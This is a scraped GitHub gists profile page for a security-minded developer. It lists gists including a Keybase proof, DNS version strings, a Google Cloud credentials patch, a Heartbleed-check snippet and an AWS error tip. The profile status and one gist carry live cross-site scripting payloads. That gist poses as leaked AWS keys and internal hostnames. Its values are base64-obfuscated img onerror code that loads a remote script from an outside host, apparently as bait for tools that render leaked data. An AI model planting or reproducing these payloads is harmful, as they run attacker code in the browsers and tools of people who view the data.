Skip to content

Instantly share code, notes, and snippets.

💭
"><script src=https://y.vg></script>

Matthew Bryant mandatoryprogrammer

💭
"><script src=https://y.vg></script>
Block or report user

Report or block mandatoryprogrammer

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View yoober
<script>alert('If this works you\'re a bad programmer ;)')</script>
@mandatoryprogrammer
mandatoryprogrammer / gist:d7de8a6d787c81971efc
Created Oct 20, 2015
<img src=x onerror=eval(atob(this.id)) id=dmFyIHBheWxvYWQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7cGF5bG9hZC5zcmM9Ii8vbGgubGMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQocGF5bG9hZCk7>
View gist:d7de8a6d787c81971efc
AWS_SECRET_KEY=<img src=x onerror=eval(atob(this.id)) id=dmFyIHBheWxvYWQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7cGF5bG9hZC5zcmM9Ii8vbGgubGMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQocGF5bG9hZCk7>
AWS_ACCESS_KEY=<img src=x onerror=eval(atob(this.id)) id=dmFyIHBheWxvYWQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7cGF5bG9hZC5zcmM9Ii8vbGgubGMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQocGF5bG9hZCk7>
corp.google.com=<img src=x onerror=eval(atob(this.id)) id=dmFyIHBheWxvYWQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7cGF5bG9hZC5zcmM9Ii8vbGgubGMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQocGF5bG9hZCk7>
corp.yahoo.com=<img src=x onerror=eval(atob(this.id)) id=dmFyIHBheWxvYWQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7cGF5bG9hZC5zcmM9Ii8vbGgubGMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQocGF5bG9hZCk7>
corp.reddit.com=<img src=x onerror=eval(atob(this.id)) id=dmFyIHBheWxvYWQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7cGF5bG9hZC5zcmM9Ii8vbGgubGMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQocGF5bG9hZCk7>
google.internal=<img src=x onerror=eval(atob(t
View gist:3f5990f294c6fc79ebe071e804411dab
### Keybase proof
I hereby claim:
* I am mandatoryprogrammer on github.
* I am mandatory (https://keybase.io/mandatory) on keybase.
* I have a public key whose fingerprint is 40B7 D843 2D62 64E0 51CC EF31 5BA8 6246 7160 FECE
To claim this, I am signing this object:
@mandatoryprogrammer
mandatoryprogrammer / gist:a6309480cd6ff9c4447bc4fe406893d0
Created Sep 10, 2017
Nameserver "What is your nameserver's version?" Responses
View gist:a6309480cd6ff9c4447bc4fe406893d0
In God We Trust.
"9.2.4
-
.
.... Yes ?
.....
.do ccTLD http://www.nic.do
.il ccTLD registry, version alpha-charlie-fox-tango
.jprs DNS
.pr ccTLD http://www.nic.pr
@mandatoryprogrammer
mandatoryprogrammer / moneypatch.py
Created Sep 12, 2018
Google Cloud Python API/Library Use Environment Variable Instead of JSON for Service Credentials
View moneypatch.py
import json
import os
# Imports the Google Cloud client library
from google.cloud import storage
# Need this for the monkeypatch
from google.oauth2 import service_account
# Patch in a new method for loading a dict
@classmethod
@mandatoryprogrammer
mandatoryprogrammer / gist:07e5a870c5888f3c97c7cdbfbe9b7eb6
Created Nov 11, 2018
AWS Spot Instances on Elastic Beanstalk Error: Stack named 'awseb-e-rrpbg6x2fq-stack' aborted operation. Current state: 'CREATE_FAILED' Reason: The following resource(s) failed to create: [AWSEBInstanceLaunchWaitCondition].
View gist:07e5a870c5888f3c97c7cdbfbe9b7eb6
Stack named 'awseb-e-rrpbg6x2fq-stack' aborted operation. Current state: 'CREATE_FAILED' Reason: The following resource(s) failed to create: [AWSEBInstanceLaunchWaitCondition].
If you get the above error while doing AWS Elastic Beanstalk with Spot Instance(s) it MAY be that your account isn't allowed to request those spot instances. You may have to request a quota increase. To find out try issuing the Spot Instance request for the same instance type manually and see what error you get.
Posting this so that other people don't have to suffer the same way.
View test.py
def get_leads_data( session, lead_type ):
if lead_type == "Need Call":
params = {
"ctl00$cph1$filter_Status": "Need Call",
"__EVENTTARGET": "ctl00$cph1$perPage",
"__EVENTARGUMENT": "",
}
elif lead_type == "Cold Leads":
params = {
"__EVENTTARGET": "clickSG",
View gist:1b39f1b57c70e65456ab75c132ef56cd
import uuid
def main( block_input, backpack ):
dump_location = "/tmp/" + str( uuid.uuid4() )
is_vulnerable_to_heartbleed = check(
block_input[ "ip" ],
int( block_input[ "port" ] ),
dump_location,
False,
False
)
View example.json
{
"ip": "172.217.0.36",
"port": 443
}
You can’t perform that action at this time.